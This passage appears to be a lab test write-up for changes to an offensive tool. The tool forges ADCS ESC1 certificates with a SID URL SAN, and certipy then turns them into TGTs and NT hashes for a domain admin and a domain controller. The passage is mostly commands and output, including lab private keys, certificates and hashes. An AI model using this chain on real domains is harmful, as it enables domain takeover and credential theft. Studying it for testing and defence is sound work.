G4WlfOJ0BmfGdm5VgNr3tZBIc5ZnyRxoxrpgW+b9lBHWXHEmlQF7iaE8uRn0AwQt
v9dNQMkCgYEA113p0pXYTpiGPccvPxfdy0y97cMH+RTbYCcAprDP1RlAmiK0l6KM
yLPQWDTl9c/Om6aEff8+RWPB0qnPm67ZsKr3Hk+po/wP4kkvoWEoHUU8geGHnImU
7GFGy0zZwmV0xhEUnC2TKmT2m2l71lmopwCd0O35rLhYW13i7RJ81P8CgYEAx2Ex
WurHeQkWrIz5ynCPxaHRGbbAK0+wG+E2JuBEbsHsP27HDyj4xo4vxPRehEQgXEhF
xaMXw1WfUhSmG1sdulqTnRAShC80FqEmUlxhS908xKOZzakNn2Ejo9bSTyaxO9vB
holXQPr4TnHtUVuTmu+lbjPvHxAa8txjKD0l4osCgYEAkpp3RMaEDFx/ZSZl3wkc
DfwbffI5RzEPdJCYPOA3WdRqyYG+dUpNk4Hz3VeFAqOG/SWJI0vQ0+NoWUMG8+8+
eKiot5V64QoAtgUjyzMb33D2E2O2sLRnD9HYIyQZR99QclPGN9o+R6maxYg0qGE4
ERa2Vzbnss96NhffFYp0N3kCgYBTL+o31N2FUpVzSR6vqGdUPj/QSr/DUmxYNY8y
iUAENkUr8jx7xsyFi63Cr3MAHKyj1EPIQlQX3BGtXZAwucOdjU0pqxsOq+M/zdz/
YCv4S0afhOMXPAHDDfSg13DINYydPQNx7rvJEO2pTT+HQn5DltmfMWwDueSEkA+P
KnQ0IQKBgQCHxyN1gT4Csc0VziLKR5bp+DVrJduF5YrmrfAlhNjbcigCFrkMv2KE
k7JmLo7gXiLlRyHeC2SI2c2AjvER0fyXeru1E7qcUuDizr+f4zU68K+WnD82Vwor
lVxJp37+B0aFZ6K8B/uRRNm9e2dEDvvxBhxuLijObKZGC5eYwQpNQg==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIF/jCCBOagAwIBAgITFAAAABGkLoNsUAu5IgAAAAAAETANBgkqhkiG9w0BAQsF
ADBCMRYwFAYKCZImiZPyLGQBGRYGZG9tYWluMRUwEwYKCZImiZPyLGQBGRYFbHVk
dXMxETAPBgNVBAMTCGx1ZHVzLUNBMB4XDTI1MDkyMTE4NDAyMFoXDTI2MDkyMTE4
NDAyMFowVDEWMBQGCgmSJomT8ixkARkWBmRvbWFpbjEVMBMGCgmSJomT8ixkARkW
BWx1ZHVzMQ4wDAYDVQQDEwVVc2VyczETMBEGA1UEAxMKZG9tYWludXNlcjCCASIw
DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKe7xN3BjxZTtcrmkO+z3HDnA+/f
Idrtu7aqHTuWbPnmKncxAiHqTXQkzwlh2fP1faYZNu/P9mzIpWHOkDFz9zCF0/De
EaAvu3Xt+TmSxQknfn86RWROhXI/Gy6E8Mf7VAgl6PNIvrur8LtYj//CyPoiAVaf
fHtXgM2UrgzD+oHKgUL+C+Ib5KEVg+rwn16ZkxJO0cILFw3VxXOFuADM9vJB17Ya
/n09NYo5n5m81CzHie4AKcoQFuYrnqnMimuFKRWOTPgkEeo9NRX2jmhxjZ/l1hCY
Om/ySUzjZz0mCWuj31tTQXsRDPUt3NwrpDhDCfAIqdv8kkX+Cv7QrsmrxHUCAwEA
AaOCAtkwggLVMD0GCSsGAQQBgjcVBwQwMC4GJisGAQQBgjcVCIXPuyKB9eBwh5WL
PITb0DiHpIYnf4zL7CGL8uAHAgFkAgEEMBMGA1UdJQQMMAoGCCsGAQUFBwMCMA4G
A1UdDwEB/wQEAwIHgDAbBgkrBgEEAYI3FQoEDjAMMAoGCCsGAQUFBwMCMB0GA1Ud
DgQWBBQJ9vNq12rZ9proCgjafosHPvtzVTCBgwYDVR0RBHwweqAoBgorBgEEAYI3
FAIDoBoMGGRvbWFpbmFkbWluQGx1ZHVzLmRvbWFpboZOdGFnOm1pY3Jvc29mdC5j
b20sMjAyMi0wOS0xNDpzaWQ6Uy0xLTUtMjEtNzEyOTgwNDkzLTE1MDMwMzQ2OTMt
MzU2NTA1OTMzMS0xMTA1MB8GA1UdIwQYMBaAFHSyXjgRsNMXlg+5A0J6Gw0eJ+Ga
MIHNBgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWx1ZHVzLUNBLENO
PUVEUi1EQzAxLTIwMjIsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bHVkdXMsREM9ZG9tYWlu
P2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxE
aXN0cmlidXRpb25Qb2ludDCBuwYIKwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAC
hoGbbGRhcDovLy9DTj1sdWR1cy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIw
U2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1sdWR1cyxE
Qz1kb21haW4/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmlj
YXRpb25BdXRob3JpdHkwDQYJKoZIhvcNAQELBQADggEBAGjSpnSHxnBFcsIGaNDs
cgDgzkt2Ub0waKgW1Z1HwUoQbZH9TUR0E25fvvHmnkCSh/7zlV/faKlP2Qp8x1+5
LX9Mx+F9hRrIofsDH0DGvUkKFxBTpXRxV5QxeAinBWEs+6fKt/6YKpVWPa+b6nMu
+/cknuzHa6yuKnA2nSRj2rvVTVuXFDoOVrDFAxWKP/iYS1G1SN8zXczUhvY8jCoy
LAV4rX2uiro2EgkrWUZgSSHicYkT2EVYugKgFJKgOTLwa2V6IxJIJLthq1Axmwt2
XhtmpNGn80YfHHaFtts5wfPm/hygrPfLd0B48Jc4wU2lHhFUpQr/0R6ZzJA0/yLs
6qc=
-----END CERTIFICATE-----
[*] Convert with  :
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

adcs_request SUCCESS.
```

Verify that the resulting certificate contains the expected SAN entries:
```
$ openssl x509 -in cert.pfx -text | grep -A1 "Subject Alternative Name"                                         
            X509v3 Subject Alternative Name: 
                othername: UPN:domainadmin@ludus.domain, URI:tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105
```

This time authentication succeeds:
```
$ certipy auth -pfx cert.pfx -dc-ip 10.7.10.11                         
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'domainadmin@ludus.domain'
[*]     SAN URL SID: 'S-1-5-21-712980493-1503034693-3565059331-1105'
[*] Using principal: 'domainadmin@ludus.domain'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'domainadmin.ccache'
[*] Wrote credential cache to 'domainadmin.ccache'
[*] Trying to retrieve NT hash for 'domainadmin'
[*] Got hash for 'domainadmin@ludus.domain': aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
```

The changes were also tested for machine accounts:
```
beacon> exec_bof ZZZZZssss EDR-DC01-2022.ludus.domain\ludus-CA ESC1 "CN=domainuser,CN=Users,DC=ludus,DC=domain" EDR-DC01-2022.ludus.domain tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1001 0 0 0 1
[*] Running BOF with name "adcs_request.x64.o"

Requesting a ESC1 certificate from EDR-DC01-2022.ludus.domain\ludus-CA for the current user
[*] CA            : EDR-DC01-2022.ludus.domain\ludus-CA
[*] Template      : ESC1
[*] Subject       : CN=domainuser,CN=Users,DC=ludus,DC=domain
[*] AltName (dns) : EDR-DC01-2022.ludus.domain
[*] AltUrl        : tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1001
[*] cert.pem      :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAy7FIZH0FnItZqZXCk6CJzFkj/8jYrKnNVEjfMG4O47A6Dtlv
y5PuNxL2fzAs93kK2NB7dSYvXKFNcXHHgoOK7Fb9FZFsx02iMsqNuknhBwm2S7Uo
P3QzNCmn+HGlzVTVDL8TbmADKNRRyadGN9AmI3mStHSCOyc624YFLpE7l6IvzMCI
5VQIAk7FfWHONabnwbSB4d1cgmexkwqNagyKbSjVfFs5vmRhgYul9cxvFzfjJSNC
jMOb4zzJ4FYWVeTYz32KL0U1+Cz4WyUoVTXFzYGqx+pky3l8rdnLZS8Pukw59mPv
/1b/RXmYAJhqy+78u33GE4cehF76/7hRXRaf6QIDAQABAoIBAEyHlCplKqmRVaO4
p71tkLhdOYBNxtLAjWvAYVLB1whG2tlfanhzYQoCLujEgfCM4r1pPylZqmvEEuOv
mwT3RUfcuwPSeqs7CNjKb4txXIGXbY1uR+vnTaGokPpwQJov6Ef8tmE+45EAjKYW
GfS4WMv1TmBMce2lpKB77xB68ofadT58aTrXL+He/xqzFMqUzLfbBJ8AHExO9XQ8
0mwX8KI753lJ/BHWucX6Tm07ZoiVmYdpePrxW9at6CElJn3OgeDoaPoTac7sIaoj
z+VuRx9ckHb3OMFWuSIe/4HM5a9C5LwAglujyxCVjKRcOxCDoGdSIMM0cHjU3MGs
9mioAH0CgYEA5v8qPW4EOmSiVYaFU6Bs3AVIRInd5mShsd8nbXhQ9Fj2yPEDiHk1
RuXbrecZuSxan91ea4q6YUSZHuYl9UfMSjao026J1xOK2ry21sKgG1w+DJibCCNr
3wsibwwrxwlslqhcL1bBDlkQHRLqt8EP0/5TWW4xBVhL32LTMr3JtjMCgYEA4b2H
E6yfQh8lX30SRu9ppkxWfA6UHzSKKvYvQ5MuPqvbskRb45evQju+umtwbv2hDcnt
HOlfES1+aGVQRPSiW/iCb1e7EgQK5hY6ZZAmZMb/z9hAJ4M+XIMD3TfKeIuwTSh8
JrY5hvSefbSPVhu3vEJqb8BDC1zHtEtgcgTSHXMCgYEAx9auO1DHVaEkE2t6QrvC
EaJ8P9cp4pziihgtavYwywOAFJz1WobJwZkvsMYCqgEmMbF4cv8keOu4sFOZORax
NO8OpUO2+huM/+lNIIRlsOXfRFRtot/J/b8LPhjAcsPDbp8eiVG7WOdSGmT4LJpY
UCVxBChhPmeB1DMR1Y79R6MCgYBRwEeI0n0ifxET0cGqus1yEjdH2ie+XVKkWF+p
g0W+IJMBrkvw0mAABo7+CCbBq0yGJ9idHc7185nRyM8XCdk6oXbrR8RRs/EWfnpL
iba9zGucI96n8JnG+xONK8VBfqUsbDr58ghHXZOARsGaF5OktBDDw8cD+GfCXYHi
COjnDQKBgCaMfEtR5jddBa3da+fdXNzlSzGnyQALaHm4fK9xdD79Zdm8uHvq9JX2
ztO42OBpUXmA4/KxsB/89W+B4EYsKujmFG2+5w/ZhAeuxzcg6HvkQ/oQ9fgPJaQm
XTYUcLKkYoSrxk2PKOAzEuI8PfNOPDog7gNVC8vTOxN6S8BKAB22
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIF7zCCBNegAwIBAgITFAAAABLbNxrC91vWaQAAAAAAEjANBgkqhkiG9w0BAQsF
ADBCMRYwFAYKCZImiZPyLGQBGRYGZG9tYWluMRUwEwYKCZImiZPyLGQBGRYFbHVk
dXMxETAPBgNVBAMTCGx1ZHVzLUNBMB4XDTI1MDkyMTE4NTE0NFoXDTI2MDkyMTE4
NTE0NFowVDEWMBQGCgmSJomT8ixkARkWBmRvbWFpbjEVMBMGCgmSJomT8ixkARkW
BWx1ZHVzMQ4wDAYDVQQDEwVVc2VyczETMBEGA1UEAxMKZG9tYWludXNlcjCCASIw
DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMuxSGR9BZyLWamVwpOgicxZI//I
2KypzVRI3zBuDuOwOg7Zb8uT7jcS9n8wLPd5CtjQe3UmL1yhTXFxx4KDiuxW/RWR
bMdNojLKjbpJ4QcJtku1KD90MzQpp/hxpc1U1Qy/E25gAyjUUcmnRjfQJiN5krR0
gjsnOtuGBS6RO5eiL8zAiOVUCAJOxX1hzjWm58G0geHdXIJnsZMKjWoMim0o1Xxb
Ob5kYYGLpfXMbxc34yUjQozDm+M8yeBWFlXk2M99ii9FNfgs+FslKFU1xc2Bqsfq
ZMt5fK3Zy2UvD7pMOfZj7/9W/0V5mACYasvu/Lt9xhOHHoRe+v+4UV0Wn+kCAwEA
AaOCAsowggLGMD0GCSsGAQQBgjcVBwQwMC4GJisGAQQBgjcVCIXPuyKB9eBwh5WL
PITb0DiHpIYnf4zL7CGL8uAHAgFkAgEEMBMGA1UdJQQMMAoGCCsGAQUFBwMCMA4G
A1UdDwEB/wQEAwIHgDAbBgkrBgEEAYI3FQoEDjAMMAoGCCsGAQUFBwMCMB0GA1Ud
DgQWBBRxFjtdG+3MzcCUgsFxkzqY4a5tITB1BgNVHREEbjBsghpFRFItREMwMS0y
MDIyLmx1ZHVzLmRvbWFpboZOdGFnOm1pY3Jvc29mdC5jb20sMjAyMi0wOS0xNDpz
aWQ6Uy0xLTUtMjEtNzEyOTgwNDkzLTE1MDMwMzQ2OTMtMzU2NTA1OTMzMS0xMDAx
MB8GA1UdIwQYMBaAFHSyXjgRsNMXlg+5A0J6Gw0eJ+GaMIHNBgNVHR8EgcUwgcIw
gb+ggbyggbmGgbZsZGFwOi8vL0NOPWx1ZHVzLUNBLENOPUVEUi1EQzAxLTIwMjIs
Q049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENO
PUNvbmZpZ3VyYXRpb24sREM9bHVkdXMsREM9ZG9tYWluP2NlcnRpZmljYXRlUmV2
b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2lu
dDCBuwYIKwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1s
dWR1cy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1sdWR1cyxEQz1kb21haW4/Y0FDZXJ0
aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkw
DQYJKoZIhvcNAQELBQADggEBAEWonUydh4kAIQCT9gQdoNTFIIOj3Ve+hhLlp8nz
UV8qERO+2vmyqKeBTZT7vKWlzvBGWSJ3YkDKi/0A2FJz3HmnBjQLMQAr6xAPAjLL
szxKJaFHyiG5WvshZxztYOQemB4x4/zOvDeC5DK+DMap7+Oq34F83K2C0YGRZKH6
mhh8dzDb6Nw4C5LLa7UoxMq2wStB9XvWlgO2Q+0e1YxXLoPMCVWfIgVs/zlng20o
rBJzqBtH0lgUSZEfg11xBLCtvY8Pt5vsi4t7PBoiD/EnDzx81NtBzsCdnMyH6Afz
FoXcyZqZBa44Evg4NjR9dW+NnqV/qtNHjeOxNEN6qie507s=
-----END CERTIFICATE-----
[*] Convert with  :
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

adcs_request SUCCESS.
```

Show resulting SAN:
```
$ openssl x509 -in cert.pfx -text | grep -A1 "Subject Alternative Name"                                         
            X509v3 Subject Alternative Name: 
                DNS:EDR-DC01-2022.ludus.domain, URI:tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1001
```

Authenticate:
```
$ certipy auth -pfx cert.pfx -dc-ip 10.7.10.11                         
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'EDR-DC01-2022.ludus.domain'
[*]     SAN URL SID: 'S-1-5-21-712980493-1503034693-3565059331-1001'
[*] Using principal: 'edr-dc01-2022$@ludus.domain'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'edr-dc01-2022.ccache'
[*] Wrote credential cache to 'edr-dc01-2022.ccache'
[*] Trying to retrieve NT hash for 'edr-dc01-2022$'
[*] Got hash for 'edr-dc01-2022$@ludus.domain': aad3b435b51404eeaad3b435b51404ee:2ee4f54dcf70284ea79926af1e28c602
```